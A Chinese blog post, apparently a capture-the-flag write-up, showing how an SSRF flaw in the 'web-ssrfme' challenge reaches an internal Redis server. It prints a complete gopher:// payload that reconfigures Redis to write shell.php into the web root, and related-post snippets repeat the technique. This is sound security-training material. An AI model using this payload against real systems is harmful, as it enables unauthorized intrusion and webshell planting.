web-ssrfme

最新推荐文章于 2025-04-23 16:21:14 发布
最新推荐文章于 2025-04-23 16:21:14 发布
阅读量334 收藏 10
点赞数 4
文章标签: 功能测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pdxdhmk318/article/details/147324693
版权

一、题目环境

二、测试

使用http协议进行内网主机存活探测

查看代码发现file和dict都被过滤了以及127.0.0.1和localhost,但是它可以通过phpinfo的条件

三、漏洞点找寻

我们尝试用http访问以下phpinfo的IP,用http协议来探测端口,通过burpsuite抓包扫描端口得到80端口以及显示6379端口有个报错,这是redis的报错,说明这台内网主机上还运行着redis服务。

四、开始渗透

我们可以传webshell到服务器上,但是这个需要我们知道物理路径,但物理路径我们是不知道,我们可以尝试一些默认路径/var/www/html、 /usr/shart/nginx/html,发现都不行。现在我们怀疑是不是权限不够的原因,权限不够那咋个办,我们再找一下在html下有没有别的文件权限是够的。我们找个字典用bp扫描一下,发现有个upload

尝试在这个路径下 /var/www/html/upload使用gopher协议进行webshell写入

使用gopherus这个工具来构造我们的payload

gopher://172.20.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2420%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

继续测试

pdxdhmk318
关注
web-ssrfme环境
08-25
使用docker-compose安装
web-ssrfme.tar.gz
04-22
docker压缩包
Web-SSRFMe
Code-5的博客
08-25 429
利用 SSRF 漏洞: 攻击者使用 SSRF 漏洞向 Redis 服务器发起请求。由于 SSRF 漏洞允许攻击者指定任意 URL,攻击者可以将 url 参数设置为 Redis 服务的地址,比如 http://127.0.0.1:6379(Redis 默认端口)。 Redis 未授权访问: 如果 Redis 没有配置密码保护(即默认未授权访问),攻击者可以通过 SSRF 漏洞直接与 Redis 服务器通信。 Redis 的默认端口是 6379,攻击者可以利用 SSRF 漏洞发起对这个端口的请求,获取 Re
Web-ssrfme
丁航航的博客
08-24 509
查看代码发现,如果传递参数info,那么会打印phpinfo(),尝试看看有没有有用的线索。但是查看代码发现,过滤了file、dict、localhost等。查看代码发现,存在url接收参数,传递参数尝试是否含有ssrf。访问内网的.2的6379端口,出现了redis的报错。那么尝试利用内网IP进行探测端口,这里使用burp。那么咱们尝试url为内网IP能不能有打印的东西。那么尝试扫描路径,尝试寻找权限低的文件插入。发现打印了两次,也就是读取了两次这个文件。从这里看,只开放了80端口,那没有什么用。
web-ssrfme 复现 2月公开赛 -redis 未授权访问攻击
a1852384503的博客
03-30 367
首先自己部署在虚拟机上部署号靶机环境打开网页。
Web-ssrfme复现
m0_64238664的博客
08-25 685
但是查看代码发现,过滤了file、dict、localhost等,过滤dict是为了防止探测端口。这里看见了,打印了两次也就是读取了两次文件,我就可以尝试使用端口探测burp。可以看到6379的端口也开放着,访问一下出现redis的报错就可以攻击了。查看代码发现,存在url接收参数,传递参数尝试是否含有。可以尝试一下url能不能有打印的东西。除了80端口也就2.3有点可疑。通过docker拉取环境。,发现确实存在ssrf。要进行url编码在攻击。
一道ssrf题目--Web-ssrfme
banliyaoguai的博客
08-26 1854
我们可以传webshell到服务器上,但是这个需要我们知道物理路径,这道题目物理路径我们是不知道,需要我们猜测,我们尝试一些默认路径/var/www/html、 /usr/shart/nginx/html,发现都不行。现在我们怀疑是不是权限不够的原因,权限不够那咋个办,我们再找一下在html下有没有别的文件权限是够的。我们接着尝试,我们现在发现服务器的IP是172.21.0.3这个端口,这是在内网当中,在内网当中服务器可能会很多,并且服务器IP可能是连续的,我们可以尝试一下有没有别的服务器供我们入侵。
ssrf--web-ssrfme例题
m0_65350813的博客
08-24 359
给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。我们使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。只开放了一个80端口,也没有数据库,如果按172.21.0.3路径一直找端口,肯定是不行的。
二月公开赛Web-ssrfme
weixin_73921499的博客
04-01 432
这台内网服务器(172.18.0.3)上还存在http服务,所以将webshell写入其web目录,然后使用ssrf进行访问。url通过GET请求访问界面,过滤file://(本地文件协议),dict://协议等,例如。接着探测这两个服务器的哪些端口为开放状态,发现了172.20.0.3:6379,浏览器执行访问url时会现将其进行解码,尝试对url进行编码,再次访问,还是失败。再次生成shell,路径修改为/var/www/html/upload。查看IP,172.18.0.2,是一个内网IP,
Web-ssrfme 2月公开赛 --SSRF及redis未授权访问
qq_58456004的博客
04-05 589
SSRF 漏洞:利用 Web 服务的参数(如url)访问内网资源。Redis 未授权访问:Redis 无密码且暴露内网端口,允许直接执行命令。Gopher 协议:通过 TCP 隧道发送原始 Redis 命令(需手动构造 RESP 协议格式)。持久化攻击:篡改 Redis 配置,将数据保存为 Web 可访问的 PHP 文件Redis 未设置密码且允许外网访问。Redis 运行用户有权限写入 Web 目录。存在 SSRF 漏洞或可发送 Gopher 请求。防御措施:1.Redis 安全配置。
Web-ssrfme docker包
08-24
Web-ssrfme docker包
接口测试和功能测试详解
huace3740的博客
04-23 1374
接口测试是测试系统组件间接口的一种测试。接口测试主要用于检测外部系统与系统之间以及内部各个子系统之间的交互点。测试的重点是要检查数据的交换,传递和控制管理过程,以及系统间的相互逻辑依赖关系等。
scratch少儿编程逻辑思维游戏源码-战舰 v2.0.zip
05-06
scratch少儿编程逻辑思维游戏源码-战舰 v2.0.zip
(E卷,100分)- 最大矩阵和(Java & JS & Python & C).html
05-06
(E卷,100分)- 最大矩阵和(Java & JS & Python & C).html
C#实现WebSocket源码
最新发布
05-06
WebSocket是一种在客户端和服务器之间建立持久连接的协议,它允许双方进行双向通信,极大地提高了实时性,被广泛应用于即时通讯、在线游戏、股票交易等领域。本篇将详细讲解如何使用C#来实现WebSocket,以及Fleck库在其中的作用。 WebSocket协议基于HTTP的握手过程,但一旦连接建立,它就不再依赖HTTP,而是通过TCP直接通信。在C#中,我们可以利用.NET Framework或.NET Core提供的System.Net.WebSockets命名空间来创建WebSocket服务器和客户端。然而,对于更高级的功能和更好的灵活性,开发者通常会选择第三方库,如Fleck。 Fleck是C#中一个轻量级且高效的WebSocket服务器实现。它提供了丰富的事件驱动API,使得开发者可以轻松地处理WebSocket连接的建立、消息传递和断开等操作。下面我们将探讨Fleck的使用步骤: 1. **安装Fleck**:你需要在你的项目中添加Fleck库。如果你使用的是NuGet包管理器,可以通过搜索"Fleck"并安装来获取。 2. **初始化服务器**:在C#代码中,首先创建一个Fleck服务器实例,指定监听的IP地址和端口号。例如: ```csharp var server = new Fleck.WebSocketServer("ws://localhost:8080"); ``` 3. **配置服务器**:你可以设置各种配置选项,如最大接收/发送缓冲区大小、心跳间隔等。然后注册事件处理器,如OnOpen、OnClose、OnMessage等,以处理客户端连接、断开和消息接收。 4. **连接事件**:`OnOpen`事件在客户端连接时触发,你可以在这里对新连接进行初始化操作,如存储连接信息、验证用户等。 5. **消息处理**:`OnMessage`
实训商业源码-苍穹衔电街电共享充电宝挂机源码-毕业设计.zip
05-06
实训商业源码-苍穹衔电街电共享充电宝挂机源码-毕业设计.zip
Android Studio日历备忘录记事本源码项目:SQLite数据库管理,快速开发,功能丰富,美观易用,适合新手学习
05-06
内容概要:本文详细介绍了基于Android Studio开发的日历备忘录记事本项目,涵盖日历查看、添加备忘录、闹钟提醒和删除备忘录等功能。项目使用SQLite数据库进行数据管理和持久化,利用AlarmManager实现闹钟提醒功能。文章深入讲解了各个功能模块的实现细节,如日历视图的使用、数据库操作类的设计、闹钟设置的逻辑以及界面交互的优化。此外,还探讨了一些常见的开发技巧和注意事项,如时间戳的存储、手势识别的应用等。 适用人群:适用于初学者和有一定经验的Android开发者,尤其是希望深入了解SQLite数据库操作和AlarmManager使用的开发者。 使用场景及目标:① 学习如何使用Android Studio构建完整的应用程序;② 掌握SQLite数据库的基本操作,包括建表、增删查改;③ 理解AlarmManager的工作机制及其在实际项目中的应用;④ 提升用户体验,如优化界面交互和提高代码质量。 其他说明:文中提供的源码和详细的代码注释有助于读者更好地理解和实践。同时,项目中预留了一些扩展任务,鼓励读者进一步探索和提升技能。
TensorRT加速的YOLOv5智能监控平台:多线程多任务并行处理,视频监控与录像回放一体化管理
05-06
内容概要:本文详细介绍了如何使用TensorRT加速YOLOv5模型推理,并结合QT框架搭建一个多任务并行处理的智能监控平台。主要内容包括:YOLOv5与TensorRT的融合,通过将YOLOv5模型转换为ONNX格式并进一步转化为TensorRT引擎,从而大幅提升推理速度;QT框架的应用,利用其跨平台特性实现视频监控、录像回放、电子地图等多种功能;16路视频并行检测的具体实现,通过多线程机制和CUDA流的支持,确保系统的高效运行。此外,文章还探讨了模型热更新、网络流处理、日志记录等方面的优化措施。 适合人群:具备一定编程基础,尤其是熟悉C++、Python和深度学习框架的研究人员和技术开发人员。 使用场景及目标:适用于需要高效、智能监控解决方案的企业和个人开发者。主要目标是提高视频监控系统的效率和智能化水平,如安防监控、交通监测等领域。 其他说明:文中提供了大量代码示例,帮助读者更好地理解和应用所介绍的技术。同时强调了系统设计中的性能优化技巧,如内存管理和多线程调度等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值